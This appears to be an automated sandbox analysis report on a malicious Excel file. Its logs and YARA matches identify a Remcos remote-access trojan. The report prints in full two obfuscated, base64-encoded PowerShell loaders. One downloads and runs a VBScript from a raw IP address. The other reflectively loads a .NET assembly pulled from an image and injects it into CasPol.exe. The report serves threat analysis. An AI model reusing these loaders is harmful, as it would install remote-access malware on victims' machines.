                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = 'JHNvcnJlbmFyID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRlc2VyZGFyID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskZGVzYXZlc3NvID0gJGRlc2VyZGFyLkRvd25sb2FkRGF0YSgkc29ycmVuYXIpOyR0b21iZWlybyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRkZXNhdmVzc28pOyRjcmV0aW5pemFyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRnbGFuZHVsaWZvcm1lID0gJzw8QkFTRTY0X0VORD4+JzskZ3Jvc2EgPSAkdG9tYmVpcm8uSW5kZXhPZigkY3JldGluaXphcik7JHRyaWdsb3R0aXNtbyA9ICR0b21iZWlyby5JbmRleE9mKCRnbGFuZHVsaWZvcm1lKTskZ3Jvc2EgLWdlIDAgLWFuZCAkdHJpZ2xvdHRpc21vIC1ndCAkZ3Jvc2E7JGdyb3NhICs9ICRjcmV0aW5pemFyLkxlbmd0aDskZGVzYWJhZmFyID0gJHRyaWdsb3R0aXNtbyAtICRncm9zYTskc29mZnJpdmVsbWVudGUgPSAkdG9tYmVpcm8uU3Vic3RyaW5nKCRncm9zYSwgJGRlc2FiYWZhcik7JGNvbnRyYWNhbWJpYXIgPSAtam9pbiAoJHNvZmZyaXZlbG1lbnRlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb2Zmcml2ZWxtZW50ZS5MZW5ndGgpXTskY2F0YXJhY3RhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkY29udHJhY2FtYmlhcik7JGJhbWJ1bGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhcmFjdGEpOyR0cmluY29sZWpvID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRyaW5jb2xlam8uSW52b2tlKCRudWxsLCBAKCd0eHQuUkVSVlJTLzA4Ni8xNjEuNTYuMzkuMjQxLy86cHR0aCcsICckYW5pbWFyJywgJyRhbmltYXInLCAnJGFuaW1hcicsICdDYXNQb2wnLCAnJGFuaW1hcicsICckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCcxJywnJGFuaW1hcicpKTs=';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamenteJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = 'JHNvcnJlbmFyID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRlc2VyZGFyID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskZGVzYXZlc3NvID0gJGRlc2VyZGFyLkRvd25sb2FkRGF0YSgkc29ycmVuYXIpOyR0b21iZWlybyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRkZXNhdmVzc28pOyRjcmV0aW5pemFyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRnbGFuZHVsaWZvcm1lID0gJzw8QkFTRTY0X0VORD4+JzskZ3Jvc2EgPSAkdG9tYmVpcm8uSW5kZXhPZigkY3JldGluaXphcik7JHRyaWdsb3R0aXNtbyA9ICR0b21iZWlyby5JbmRleE9mKCRnbGFuZHVsaWZvcm1lKTskZ3Jvc2EgLWdlIDAgLWFuZCAkdHJpZ2xvdHRpc21vIC1ndCAkZ3Jvc2E7JGdyb3NhICs9ICRjcmV0aW5pemFyLkxlbmd0aDskZGVzYWJhZmFyID0gJHRyaWdsb3R0aXNtbyAtICRncm9zYTskc29mZnJpdmVsbWVudGUgPSAkdG9tYmVpcm8uU3Vic3RyaW5nKCRncm9zYSwgJGRlc2FiYWZhcik7JGNvbnRyYWNhbWJpYXIgPSAtam9pbiAoJHNvZmZyaXZlbG1lbnRlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb2Zmcml2ZWxtZW50ZS5MZW5ndGgpXTskY2F0YXJhY3RhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkY29udHJhY2FtYmlhcik7JGJhbWJ1bGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhcmFjdGEpOyR0cmluY29sZWpvID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRyaW5jb2xlam8uSW52b2tlKCRudWxsLCBAKCd0eHQuUkVSVlJTLzA4Ni8xNjEuNTYuMzkuMjQxLy86cHR0aCcsICckYW5pbWFyJywgJyRhbmltYXInLCAnJGFuaW1hcicsICdDYXNQb2wnLCAnJGFuaW1hcicsICckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCckYW5pbWFyJywnJGFuaW1hcicsJyRhbmltYXInLCcxJywnJGFuaW1hcicpKTs=';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 770B0000 page execute and read and write
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,29_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_00401806 NtdllDefWindowProc_W,29_2_00401806
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_004018C0 NtdllDefWindowProc_W,29_2_004018C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_004016FD NtdllDefWindowProc_A,30_2_004016FD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_004017B7 NtdllDefWindowProc_A,30_2_004017B7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00402CAC NtdllDefWindowProc_A,31_2_00402CAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00402D66 NtdllDefWindowProc_A,31_2_00402D66
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,32_2_004158B9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE89A934CE7_2_000007FE89A934CE
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE89A96FBE7_2_000007FE89A96FBE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0044B04029_2_0044B040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0043610D29_2_0043610D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0044731029_2_00447310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0044A49029_2_0044A490
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0040755A29_2_0040755A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0043C56029_2_0043C560
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0044B61029_2_0044B610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0044D6C029_2_0044D6C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_004476F029_2_004476F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0044B87029_2_0044B870
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0044081D29_2_0044081D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0041495729_2_00414957
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_004079EE29_2_004079EE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_00407AEB29_2_00407AEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0044AA8029_2_0044AA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_00412AA929_2_00412AA9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_00404B7429_2_00404B74
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_00404B0329_2_00404B03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0044BBD829_2_0044BBD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_00404BE529_2_00404BE5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_00404C7629_2_00404C76
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_00415CFE29_2_00415CFE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_00416D7229_2_00416D72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_00446D3029_2_00446D30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_00446D8B29_2_00446D8B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_00406E8F29_2_00406E8F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0040503830_2_00405038
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0041208C30_2_0041208C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_004050A930_2_004050A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0040511A30_2_0040511A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0043C13A30_2_0043C13A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_004051AB30_2_004051AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0044930030_2_00449300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0040D32230_2_0040D322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0044A4F030_2_0044A4F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0043A5AB30_2_0043A5AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0041363130_2_00413631
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0044669030_2_00446690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0044A73030_2_0044A730
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_004398D830_2_004398D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_004498E030_2_004498E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0044A88630_2_0044A886
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0043DA0930_2_0043DA09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_00438D5E30_2_00438D5E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_00449ED030_2_00449ED0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0041FE8330_2_0041FE83
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_00430F5430_2_00430F54
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_004050C231_2_004050C2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_004014AB31_2_004014AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0040513331_2_00405133
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_004051A431_2_004051A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0040124631_2_00401246
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0040CA4631_2_0040CA46
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0040523531_2_00405235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_004032C831_2_004032C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0040168931_2_00401689
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00402F6031_2_00402F60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0041D07132_2_0041D071
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_004520D232_2_004520D2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0043D09832_2_0043D098
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0043715032_2_00437150
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_004361AA32_2_004361AA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0042625432_2_00426254
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0043137732_2_00431377
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0043651C32_2_0043651C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0041E5DF32_2_0041E5DF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0044C73932_2_0044C739
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_004367C632_2_004367C6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_004267CB32_2_004267CB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0043C9DD32_2_0043C9DD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00432A4932_2_00432A49
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00436A8D32_2_00436A8D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0043CC0C32_2_0043CC0C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00436D4832_2_00436D48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00434D2232_2_00434D22
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00426E7332_2_00426E73
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00440E2032_2_00440E20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0043CE3B32_2_0043CE3B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00412F4532_2_00412F45
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00452F0032_2_00452F00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00426FAD32_2_00426FAD
                  Source: 0200011080.xlsOLE indicator, VBA macros: true
                  Source: CC430000.0.drOLE indicator, VBA macros: true
                  Source: 0200011080.xlsStream path 'MBD001F7C6C/\x1Ole' : https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker_s$r(&D<ww(>Ki)H58pMI:}<qA^;'-{&FV7~j_2Lvo.#'HO~mPg@OzyPlPH-5FBmH1Tm3ME3XrMefYA0OxnC915NeitCTz9lMd35xt69DxMKYP72SCAfR2XsbTVnlxmedr6vMDdY33ERcnCux3esmvMwP9mylUDxQfvbkancgFmHZBQyF0xO3izBVpLfrLU241MnQsQQ0eLZaaqSqW1zpxlCHmF3HuWpD3aTKIOs0aazidKENDEhLixBE6mkhx5GcpElsmFZr6XkSRh7nkXtQki797jSVs1t8OJFPG@W:$oEV"Cl&c
                  Source: CC430000.0.drStream path 'MBD001F7C6C/\x1Ole' : https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker_s$r(&D<ww(>Ki)H58pMI:}<qA^;'-{&FV7~j_2Lvo.#'HO~mPg@OzyPlPH-5FBmH1Tm3ME3XrMefYA0OxnC915NeitCTz9lMd35xt69DxMKYP72SCAfR2XsbTVnlxmedr6vMDdY33ERcnCux3esmvMwP9mylUDxQfvbkancgFmHZBQyF0xO3izBVpLfrLU241MnQsQQ0eLZaaqSqW1zpxlCHmF3HuWpD3aTKIOs0aazidKENDEhLixBE6mkhx5GcpElsmFZr6XkSRh7nkXtQki797jSVs1t8OJFPG@W:$oEV"Cl&c
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004169A7 appears 87 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004020E7 appears 39 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 0044DB70 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004165FF appears 35 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00422297 appears 42 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00401F66 appears 50 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00444B5A appears 37 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004338A5 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00413025 appears 79 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00416760 appears 69 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00433FB0 appears 55 times
                  Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                  Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                  Source: 32.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 32.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 32.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 32.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 32.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
